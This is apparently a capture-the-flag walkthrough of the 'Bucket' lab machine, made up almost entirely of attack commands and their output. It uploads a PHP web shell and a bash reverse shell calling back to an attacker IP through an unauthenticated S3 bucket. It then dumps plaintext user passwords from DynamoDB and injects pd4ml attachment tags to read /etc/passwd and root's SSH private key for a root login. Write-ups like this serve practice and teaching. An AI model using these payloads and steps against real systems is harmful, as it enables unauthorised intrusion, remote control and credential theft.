Bucket
AWS DynamoDB Command Documentation
└─$ sudo nmap 10.10.10.212 -p- --min-rate=10000 -T4 -sCV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://bucket.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
└─$ echo "10.10.10.212 bucket.htb" | sudo tee -a /etc/hosts
http://bucket.htb/
View source code
<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
</div>
<div class="description">
<h3>Bug Bounty and 0day Research</h3>
<span>march 17, 2020 | Security</span>
<p>Customised bug bounty and new 0day feeds. Feeds can be used on TV, mobile, desktop and web applications. Collecting security feeds from 100+ different trusted sources around the world.</p>
</div>
</article>
<div class="articles">
<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/malware.png" alt="Malware" height="160" width="160">
</div>
<div class="description">
<h3>Ransomware Alerts</h3>
<span>march 17, 2020 | Malware</span>
<p>Run awareness ad campaigns on Ransomwares and other newly found malwares. Choose different types of malwares to fit for your campaign</p>
</div>
</article>
<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/cloud.png" alt="cheer" height="160" width="160">
</div>
<div class="description">
<h3>Cloud Updates</h3>
<span>march 17, 2020 | Cloud</span>
<p>Stay tuned to cloud technology updates. A superior alternative to Push Notifications and SMS A2P alerts. </p>
</div>
</article>
└─$ echo "10.10.10.212 s3.bucket.htb" | sudo tee -a /etc/hosts
Then, refresh the website, you will see images.
email: support@bucket.htb
└─$ wfuzz -c -u http://bucket.htb/ -H "Host: FUZZ.bucket.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hl 9
└─$ curl -v http://s3.bucket.htb/
* Trying 10.10.10.212:80...
* Connected to s3.bucket.htb (10.10.10.212) port 80
> GET / HTTP/1.1
> Host: s3.bucket.htb
> User-Agent: curl/8.4.0
> Accept: */*
>
< HTTP/1.1 404
< Date: Thu, 22 Feb 2024 01:15:14 GMT
< Server: hypercorn-h11
< content-type: text/html; charset=utf-8
< content-length: 21
< access-control-allow-origin: *
< access-control-allow-methods: HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH
< access-control-allow-headers: authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging
< access-control-expose-headers: x-amz-version-id
<
* Connection #0 to host s3.bucket.htb left intact
{"status": "running"}
# Test PUT (upload)
curl -X PUT --data-binary "test" http://s3.bucket.htb/adserver/test.txt
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# successfullly upload to the bucket, but cannot be executed
curl -X PUT -H "Content-Type: application/x-httpd-php" --data-binary "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.103/4444 0>&1'\"); ?>" http://s3.bucket.htb/adserver/shell.php
curl -X PUT --data-binary "AddType application/x-httpd-php .php" http://s3.bucket.htb/adserver/.htaccess
sudo apt install awscli
# list bucket
aws --endpoint-url=http://s3.bucket.htb s3 ls
Unable to locate credentials. You can configure credentials by running "aws configure".
# configure the keys by using a random credential
aws configure
AWS Access Key ID [None]: test
AWS Secret Access Key [None]: test
Default region name [None]: us-east-1
Default output format [None]:
aws --endpoint-url=http://s3.bucket.htb s3 ls
2025-04-24 07:46:03 adserver
# list content in s3 bucket
aws --endpoint-url=http://s3.bucket.htb s3 ls s3://adserver
PRE images/
2025-04-24 07:46:04 5344 index.html
aws --endpoint-url=http://s3.bucket.htb s3 cp shell.php s3://adserver
upload: ./shell.php to s3://adserver/shell.php
http://bucket.htb/shell.php?cmd=id
If you use s3 bucket link to access the shell.php file, it will download the file instead of execute it.
http://s3.bucket.htb/shell.php?cmd=id
The uploaded files will be deleted in minutes.
echo "<?php exec('/bin/bash -c \"bash -i >& /dev/tcp/10.10.15.103/4444 0>&1 \"'); ?>" > shell.php
aws --endpoint-url=http://s3.bucket.htb s3 cp shell.php s3://adserver
upload: ./shell.php to s3://adserver/shell.php
# to obtain though a stable and interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash");'
CRTL + Z
stty raw -echo
/home/roy/project$ cat db.php
cat db.php
<?php
require 'vendor/autoload.php';
date_default_timezone_set('America/New_York');
use Aws\DynamoDb\DynamoDbClient;
use Aws\DynamoDb\Exception\DynamoDbException;
$client = new Aws\Sdk([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
$dynamodb = $client->createDynamoDb();
//todo
$ aws configure
aws configure
AWS Access Key ID [None]: test
AWS Secret Access Key [None]: test
Default region name [None]: us-east-1
Default output format [None]:
[Errno 13] Permission denied: '/var/www/.aws'
$ mkdir /tmp/f
$ export HOME=/tmp/f
$ aws configure
aws configure
AWS Access Key ID [None]: test
AWS Secret Access Key [None]: test
Default region name [None]: us-east-1
Default output format [None]:
# List all tables from bynamodb
$ aws --endpoint-url=http://localhost:4566 dynamodb list-tables
{
"TableNames": [
"users"
]
}
$ aws --endpoint-url=http://localhost:4566 dynamodb scan --table-name users
{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}
Roy
roy:n2vM-<_K_Q:.Aa2
$ netstat -tunl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:34821 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
udp 0 0 127.0.0.53:53 0.0.0.0:*
roy@bucket:/var/www/bucket-app$ cat index.php
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
if($_POST["action"]==="get_alerts") {
date_default_timezone_set('America/New_York');
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
));
foreach ($iterator as $item) {
$name=rand(1,10000).'.html';
file_put_contents('files/'.$name,$item["data"]);
}
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
}
}
else
{
?>
The above code connects to DynamoDB service and performs a scan of the alerts table. It then filters the content based on title. If there's a key that contains Ransomware title then it writes its data value to a random html file inside files folder. Using the PD4ML utility it converts the HTML contents to a PDF file. By checking the list of tables, we observe that there's no alerts table present in the DynamoDB database.
$ ssh -L 8000:127.0.0.1:8000 roy@bucket.htb
pd4ml_demo.jar is used to create PDFs by the site on port 8000.
# create alerts table, the table will be automatically deleted in minutes
aws --endpoint-url=http://localhost:4566 dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5
aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><h1>test</h1></html>"}}'
{
"ConsumedCapacity": {
"TableName": "alerts",
"CapacityUnits": 1.0
}
}
# on Kali
curl http://localhost:8000/index.php -d 'action=get_alerts'
We see that the PDF is indeed created with HTML that we provided in the database. Checking the supported HTML tags for pd4ml reveals that we can also embed an external resource as PDF
attachment using the attachment tag.
This feature seems like no longer exists in the latest version.
<pd4ml:attachment src="http://pd4ml.com/i/logo.png" description="test"
icon="Paperclip"/>
<html><pd4ml:attachment src="file:///etc/passwd" description="test"
icon="Paperclip"/></html>
aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src=\"file:///etc/passwd\" description=\"test\" icon=\"Paperclip\"/></html>"}}'
aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///etc/passwd'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'
aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///root/'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'
aws --endpoint-url=http://localhost:4566 dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><pd4ml:attachment src='\''file:///root/.ssh/id_rsa'\'' description='\''test'\'' icon='\''Paperclip'\''/></html>"}}'
chmod 600 id_rsa
ssh -i id_rsa root@bucket.htb